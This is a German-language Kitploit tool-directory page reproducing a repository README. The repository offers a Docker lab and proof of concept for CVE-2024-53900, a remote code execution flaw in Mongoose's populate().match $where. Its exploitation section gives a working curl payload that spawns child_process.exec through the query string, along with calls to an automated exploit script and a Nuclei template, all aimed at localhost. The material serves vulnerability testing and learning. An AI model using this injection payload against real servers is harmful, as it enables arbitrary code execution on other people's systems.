Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-53900 — Reproduzierbare Umgebung und PoC für CVE-2024-53900, eine kritische RCE in Mongoose über populate().match $where. Enthält automatisiertes Exploit-Skript und Nuclei-Vorlage für Sicherheitstests. | Kitploit
Tools/GitHubGitHub/www-spam/cve-2024-53900
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubwww-spam/cve-2024-53900

CVE-2024-53900

Reproduzierbare Umgebung und PoC für CVE-2024-53900, eine kritische RCE in Mongoose über populate().match $where. Enthält automatisiertes Exploit-Skript und Nuclei-Vorlage für Sicherheitstests.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-53900 - Mongoose populate().match $where RCE

Dieses Repository stellt eine reproduzierbare verwundbare Umgebung und einen PoC für CVE-2024-53900 bereit, eine kritische Remote-Code-Ausführungs-Sicherheitslücke (RCE) in Mongoose < 8.8.3.


📌 Schwachstellendetails

  • CVE: CVE-2024-53900
  • Betroffen: Mongoose < 8.8.3
  • Schweregrad: Kritisch (CVSS 9.1)
  • Vektor: populate().match kombiniert mit $where
  • Auswirkung: Beliebige JavaScript-Ausführung (RCE) im Node.js-Kontext

Referenzen:

  • GitHub Advisory
  • Fix Commit

🛠️ Einrichtungsanleitung

1. Repository klonen

root@kitploit:~
git clone https://github.com/www-spam/CVE-2024-53900.git
cd CVE-2024-53900

2. Umgebung starten (Docker Compose)

root@kitploit:~
docker-compose up -d

📌 GUI PoC (Taschenrechner)

Standardmäßig läuft die verwundbare Node.js-App innerhalb von Docker.
Allerdings werden GUI-Anwendungen (wie xcalc oder gnome-calculator) innerhalb eines Containers nicht gestartet.

👉 Wenn Sie die RCE durch Öffnen eines Taschenrechners demonstrieren möchten:

  1. MongoDB in Docker ausführen (als DB-Backend)

    root@kitploit:~
    docker run -d --name mongo -p 27017:27017 mongo:6
    
  2. Die verwundbare Node.js-App lokal ausführen

root@kitploit:~
   cd ~/cve-2024/app
   npm install
   node server.js
  • MongoDB läuft auf Port 27017
  • Die verwundbare Node.js-App läuft auf Port 5000

📂 Verzeichnisstruktur

root@kitploit:~
/home/kali/cve-2024/
├── docker-compose.yml     # Umgebungseinrichtung
├── exploit.py             # Automatisiertes Exploit-Skript
├── CVE-2024-53900.yaml    # Nuclei-Vorlage
├── README.md              # Dokumentation
├── app/                   # Verwundbare Node.js-App
│   ├── Dockerfile
│   ├── package.json
│   ├── server.js
│   ├── models.js
│   └── views/
└── data/                  # MongoDB-Volume

🚀 Exploitation

Manueller Test

root@kitploit:~
curl "http://localhost:5000/book/{OBJECT_ID}/detail?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('xcalc')"

Automatisierter PoC

root@kitploit:~
python3 exploit.py --url http://localhost:5000

Mit Nuclei

root@kitploit:~
nuclei \ -u http://localhost:5000/book/{{OBJECT_ID}/detail \ -t ~/.local/nuclei-templates/CVE-2024-53900.yaml \ -var pfield=author
image

🔒 Sicherheitshinweise

  • Nur für Forschung und Tests (nicht für die Produktion).
  • Payload auf sichere Operationen beschränkt (z. B. Dateierstellung).
  • Vollständig isoliert mittels Docker.

✅ Getestete Umgebung

  • OS: Kali Linux
  • MongoDB: mongo:6
  • Node.js: 18
  • Mongoose: 8.5.0 (verwundbar)
  • Express: 4.18.2

📸 Demo

Image
Tool herunterladen